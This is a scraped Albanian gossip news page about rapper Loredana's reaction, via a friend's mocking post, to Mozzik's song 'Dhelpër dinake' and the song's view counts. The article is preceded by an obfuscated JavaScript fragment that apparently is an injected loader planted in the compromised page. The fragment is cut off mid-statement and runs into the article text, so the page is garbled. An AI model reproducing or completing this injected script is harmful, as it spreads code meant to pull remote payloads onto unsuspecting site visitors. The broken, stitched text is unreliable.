;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Më në fund, Loredana ka diçka për të thënë për ‘Dhelpër dinake’

By

Që prej publikimit të këngës ‘Dhelpër dinake’ nga Mozzik fansat kanë qenë tejet të bindur që ky projekt i dedikohet Loredanës, pas ndarjes.

E duket se një gjë të tillë, tërthorazi e ka pranuar edhe vetë reperja.

Prive.al ka arritur t’i sigurojë disa komunikime në gjuhën gjermane të Loredanës me shoqërinë e saj që komentojnë këtë projekt.

Ka qenë një prej shoqeve të saj që ka ndarë fotografinë e Mozzik me modelen në klip, fytyrën e të cilës e ka mbuluar me imazh gomari nën mbishkrimin: ‘’Unë nuk kam dhelpra, por kam zbuluar një gomar për të’ duke etiketuar Lorin.

Ky postim me tone tallëse për Mozzik i cili portretizohet se ka përfunduar me ‘gomar’ është pasuar me komente në të cilat edhe Loredana ka thënë fjalën e saj.

‘Unë jam një dhelpër’ – komenton Loredana e cila pasohet nga Omari, një shok i saj që shprehet: ‘Të paktën dikush po pretendon [një gjë të tillë]’.

Drama duket se vazhdon e kjo i ka ndihmuar projektit që të tejkalojë dy milionë shikime për vetëm dy ditë, një shifër rekord për artistë shqiptarë. /Prive.al

Artikuj të ngjashëm